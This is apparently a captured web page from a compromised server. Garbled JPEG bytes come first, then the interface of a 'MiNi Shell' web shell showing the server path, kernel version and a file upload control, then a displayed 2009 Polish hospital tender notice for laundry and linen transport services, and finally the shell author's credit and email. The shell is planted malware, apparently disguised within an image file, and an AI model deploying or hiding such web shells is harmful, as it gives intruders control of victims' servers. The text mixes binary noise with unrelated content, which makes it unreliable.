JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20091001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20091001/167135-N-2009.html

<p class="kh_header"><b>Głogów: Świadczenie kompleksowych usług 
          pralniczych  wraz z transportem brudnej bielizny z
          magazynu zamawiającego do zakładu pralniczego i czystej bielizny z zakładu pralniczego
         do  magazynu zamawiającego na koszt i ryzyko wykonawcy. Znak sprawy: ZP/27/2009</b><br>
<b>Numer ogłoszenia: 167135 - 2009; data zamieszczenia: 01.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki Zdrowotnej w Głogowie , ul. Kościuszki 15, 67-200 Głogów, woj. dolnośląskie, tel. 076 8373211, faks 076 8373377.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.glogow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie kompleksowych usług 
          pralniczych  wraz z transportem brudnej bielizny z
          magazynu zamawiającego do zakładu pralniczego i czystej bielizny z zakładu pralniczego
         do  magazynu zamawiającego na koszt i ryzyko wykonawcy. Znak sprawy: ZP/27/2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przewidywana ilość miesięczna przedmiotu zamówienia wynosi 11 000 kg.
           Przewidywana ilość przedmiotu zamówienia w okresie trwania umowy wynosi
        132 000 kg.
Podane wyżej ilości są ilościami szacunkowymi, zamawiający może przekazać
       mniejsze ilości bielizny w związku z mniejszą liczbą hospitalizowanych pacjentów.
       Przekazanie do prania mniejszej ilości asortymentu pozostaje bez wpływu na wysokość
       cen jednostkowych  za świadczone usługi. Zamawiający dopuszcza możliwość zmiany terminu realizacji umowy w przypadku 
       niezrealizowania całości wartości przedmiotu zamówienia w okresie trwania umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 98.31.10.00-6, 98.31.00.00-9, 98.39.30.00-4, 98.31.50.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> w niniejszym postępowaniu zamwiajacy nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy spełniający 
        warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy, tzn:
1) Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli 
         ustawy nakładają obowiązek posiadania takich uprawnień.
         Warunek ten będzie uznany za spełniony, jeżeli wykonawca wykaże, że posiada 
         uprawnienia do wykonywania określonej działalności lub czynności a na   potwierdzenie
         spełniania tego warunku załączy do oferty wymagane dokumenty,  z których wynikać
         będzie,  że wykonawca jest uprawniony do  prowadzenia działalności w zakresie
         objętym  przedmiotem  zamówienia.
  2) Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym
   i osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne
   zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób
   zdolnych do wykonania zamówienia.
	 Warunek ten będzie spełniony jeżeli wykonawca wykaże, , że posiada niezbędną 
 wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi
 do wykonania zamówienia, a także wykaże, że w okresie ostatnich trzech lat przed
 wszczęciem postępowania o  udzielenie zamówienia publicznego, a jeżeli okres 
             prowadzenia działalności jest krótszy - w ty okresie, zrealizował
co najmniej jedną usługę pralniczą dla placówek służby zdrowia o wartości nie
  mniejszej niż 350 00,00 zł brutto. 
    3)  Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie
            zamówienia.
            Warunek ten będzie uznany za spełniony, jeżeli wykonawca wykaże, że znajduje sie w
            sytuacji ekonomicznej i finansowej zapewniającej wykonanie przedmiotu zamówienia
            oraz, że posiada środki finansowe lub zdolność kredytową, a także, że  jest
            ubezpieczony od odpowiedzialności cywilnej w  zakresie  prowadzonej działalności w wysokości  nie niższej
               niż  400 000,00 zł, z klauzulą szkód wyrządzonych wskutek przeniesienia chorób 
              zakaźnych  w wysokości co najmniej 100 000,00 zł..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1) W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania 
         określonej działalności, że nie podlega wykluczeniu z postępowania na 
         podstawie art. 24 ustawy, zamawiający żąda złożenia:
         -  koncesji, zezwolenia, licencji jeśli taki dokument wymagany jest ustawowo;
         -  aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do
            ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do
            rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie 
            wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
- pełnomocnictwa dla osób niewskazanych w KRS do występowania w imieniu 
wykonawcy, w tym do składania oświadczeń woli w imieniu wykonawcy, w toku
 postępowania o udzielenie niniejszego zamówienia. W przypadku oferty grupy
 podmiotów (np. konsorcjum) wykonawcy ustanawiają pełnomocnika do
 reprezentowania ich  w postępowaniu albo reprezentowania w postępowaniu i 
 zawarcia umowy w sprawie zamówienia.
 Pełnomocnictwo winno wskazywać zakres umocowania i być przedstawione w 
 formie oryginału lub notarialnie potwierdzonej kopii.  
 W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia
 wymaga  się, aby przynajmniej jeden z wykonawców (lub wspólnie) spełniał 
 wymagania, o których  mowa w pkt  1. 
     	 W przypadku konsorcjum żaden z wykonawców wspólnie  ubiegających się o 
             udzielenie zamówienia nie może podlegać wykluczeniu na podstawie  art. 24 ust. 1 i 2
       	 ustawy Pzp.
 2) W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz
 dysponuje potencjałem technicznym i osobami zdolnymi do wykonywania
 zamówienia zamawiający żąda:
- wykaz wykonanych  usług odpowiadających swoim rodzajem i wartością dostawom
  stanowiącym przedmiot zamówienia, z podaniem ich wartości, dat wykonania i 
  odbiorców; wymagana jdna usługa wraz z dokumentami potwierdzającym należyte
  wykonanie zamówienia (np.:  referencje), z treści którego jednoznacznie  musi wynikać, że usługa została wykonana:
- terminowo, tzn. bielizna była odbierana i oddawana w godzinach wyznaczonych przez Zamawiającego;
- bielizna oddawana do prana wracała nie zniszczona;
- w zwrotach bielizny nie było pomyłek;
- nie było zastrzeżeń co do jakości prania

- wykaz środków transportu do przewozu bielizny czystej i brudnej wraz z aktualnymi
   pozytywnymi opiniami sanitarnymi wydanymi przez Państwowy Inspektorat
   Sanitarno-Epidemiologiczny z podaniem numerów rejestracyjnych samochodów
   przeznaczonych do wykonywania usługi  (wymagane dwa pojazdy);
- wykaz środków piorąco-dezynfekujących w tym dlanoworodków, 3) W celu potwierdzenia opisanego przez zamawiajacego warunku znajdowania sie prze zwykonawcę w sytuacji ekonomicznej i finansowej,zamawiający żąda
            polisy lub innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od 
               odpowiedzialności cywilnej w zakresie prowadzonej działalności.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.biuletyn.sbip.pl/zoz.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można odebrać w siedzibie zamawiającego , budynek D -  Dział Administracyjny,  w dni  robocze w  godzinach  od 7.00 do 14.00.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.10.2009 godzina 09:00, miejsce: Zespół Opieki Zdrowotnej w Głogowie, ulica Kościuszki 15, budynek Dyrekcji  
         - Kancelaria.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com